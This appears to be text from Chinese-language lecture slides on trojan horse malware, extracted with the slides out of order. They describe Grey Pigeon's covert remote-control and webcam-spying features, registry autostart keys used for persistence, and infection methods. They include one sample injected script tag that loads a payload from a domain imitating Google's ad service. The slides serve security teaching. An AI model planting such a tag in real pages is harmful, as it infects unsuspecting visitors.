一是木马植入阶段,主要是指木马安装时,释 放服务端文件以及修改系统信息; 二是木马植入后阶段,这主要是指木马成功安 装并运行后,具有了系统操作、通信等行为 特征。
灰鸽子木马强大功能
• 对远程计算机文件管理: 模仿Windows 资源管理器,可以对文件进行复制、粘 贴、删除,重命名、远程运行等,可以上传下载文件或 文件夹,操作简单易用; • 远程控制命令: 查看远程系统信息、剪切板查看、进程管理、窗口管理 、插件功能、服务管理(包括启动服务、停止服务、删 除服务、设置服务)、共享管理(包括查看共享、新建共 享、删除共享)、代理服务、MS-Dos模拟; • 捕获屏幕: 不但可以连续的捕获远程电脑屏幕,还能把本地的鼠标 及键盘传动作送到远程实现实时控制功能; • 视频监控: 可以控制远程计算机的摄像头,在服务端操作人员完 全不知情的情况下,控制端可以把摄像头目标中的拍 摄下来;
木马技术概述
内容提要
木马的概念,特点与分类 木马发展历史 木马实例演示 木马植入方法 木马行为特征 木马程序分析示例 木马设计 木马分析与木马检测 总结
木马概念
• 木马的典故: 木马,全称为“特洛伊木马”(trojan horse),其得 名于公元前十二世纪初 “特洛伊战争 ” • 木马,完成特殊任务的程序其实质只是一个在隐蔽、 非授权情况下安装和运行的网络客户端/服务器程序。 • 客户端:又叫控制端,对服务端进行远程控制的 一方 • 服务端:被控制端远程控制的一方
3、电子邮件传播法 第一种是通过邮件附件进行传播。 第二种通过邮件内容进行传播。 4、网页挂马法(CVE2010-0249,Operation Aurora,0day) CVE - Common Vulnerabilities and Exposures 这种方法是目前最流行的木马植入方法,主要是利用IE 浏览器的漏洞进行传播的,攻击者在网页上加入溢出 代码,用户在浏览网页或者点击某一个链接时,IE浏览 器溢出,溢出以后恶意代码就可以自动从网站的指定 位置下载木马文件并执行 5、应用软件漏洞法(CVE2009-4324, CVE2010-0188) 将木马文件绑定在Word、Excel、PowerPoint、Access、 pdf、Winrar等文档中,通过QQ、GoogleTalk、MSN等 P2P聊天工具或者电子邮件将这些文件发送给目标用户, 目标用户正常打开这些文档的同时,绑定在这些文档 中的木马就自动运行。
• 现在一般都是服务端主动连接客户端
• 木马的工作流程
木马的特点
• 隐藏性,
– – – – (1)在任务栏中隐藏,不产生任何窗口 (2)在任务管理器里隐藏 (3)木马文件的隐藏 (4)木马通信的隐藏
• 自启动性, • 自恢复功能
– 木马会在多处留下备份,如果其中某些文件被查杀 以后,会通过备份再次激活,或者感染其他的正常 文件,木马也会再次激活。
木马的分类
• 按功能分类
– 远程控制型木马--如:灰鸽子、冰河 – 密码盗窃型木马--如:阿拉QQ大盗 – 恶作剧型木马
• 按连接方式分类
– 正向连接型木马--如:冰河 – 反弹式木马--如:网络神偷,灰鸽子
• 按通信协议分类
– TCP木马:主流,如BO、冰河等 – UDP木马:利用UDP协议进行数据传送 – ICMP木马:利用ICMP协议进行数据传送,如lionbackdoor
木马植入阶段
1、自启动设置 (1)在注册表设置自启动项 a)Run注册表启动项 HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run b)RunOnce注册表启动项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\RunOnce WindowsXPHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\RunOnceEx
6、社会工程学法 通过各种方法获取目标用户的信任,然后通过向对方发 绑定了木马的文件引诱对方点击,或者直接在他机器上 运行木马。
推荐读物——《入侵的艺术》 by Kevin Mitnick
例子(CVE2010-0249)
• 要入侵网站拿到网站的webshell • 在网页上插入挂马代码 • 看下面代码,模仿的谷歌广告代码调用的脚本地址, 而且是调用的图片,如果不仔细看是看不出来的。只 要在网页上插入这么一段代码,马挂上了。 • <script src=http://pagead2.googlesyndication.xx.xx/pagead/log o.gif></script> • 这个图片地址空间是挂马者自己的租用的空间,域名 模仿了一些知名网络服务的域名,目的就是让人不易 察觉